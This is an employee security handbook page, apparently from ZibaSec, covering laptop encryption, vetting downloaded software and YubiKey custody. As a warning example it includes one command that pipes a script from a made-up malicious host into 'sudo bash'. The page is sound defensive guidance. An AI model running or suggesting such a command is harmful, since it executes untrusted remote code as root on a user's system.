How to Treat Your Laptop
Treat your work machine with a level of care representative of someone working in the cybersecurity domain.
- Make sure your hard drive is encrypted, and that logging in requires a password.
- Don’t leave your laptop unattended in public for any length of time.
- Ensure that any devices you connect are inert, or from trusted sources.
- Do not connect external storage media unless you are completely certain of what that storage media contains.
- Do not connect external storage media that has been left unattended.
- Ensure you’ve run the required security checks via Soteria.
Downloading or Installing Software
We don’t use Remote Management software to track or restrict how you use your laptop. We expect you to exercise proper care and diligence when installing software outside of official channels.
In general:
- Inspect ‘new’ open source software before installing/cloning/running it
- Never pipe
wget
to bash from sources that are not totally vetted. Example wget <https://dprk-warez.io/install.sh> | sudo bash
is a big no-no. If you want to experiment with potentially malicious packages, do it in a virtual machine that is not running on your work laptop.
- Trust but verify packages that you install outside of official channels/app stores. For example, you probably don’t need to do much vetting for Apple App Store downloads, but you should vet
.dmg
downloads from the open web. Equally, you don’t need to vet packages from main-line repos from popular Linux distributions (like Fedora, Debian, etc.) but you certainly should vet any repos that connect to mirrors not controlled and vetted by the main upstream communities.
- Ensure that your usage of open source software adheres to our open source policy, found in our Engineering book.
How to Treat Your YubiKey
Our full procedures are detailed in your Hardware Token Usage Agreement. This is a summary.
- The YubiKey should remain in your physical custody at all times unless stored in a locking container in your personal residence, or left in the custody of another authorized person at ZibaSec.
- The YubiKey remains the property of ZibaSec. It would make things complicated if you use it for personal accounts, so please avoid this.
- Bonus! You are authorized to purchase and keep a YubiKey for your own personal use, on us.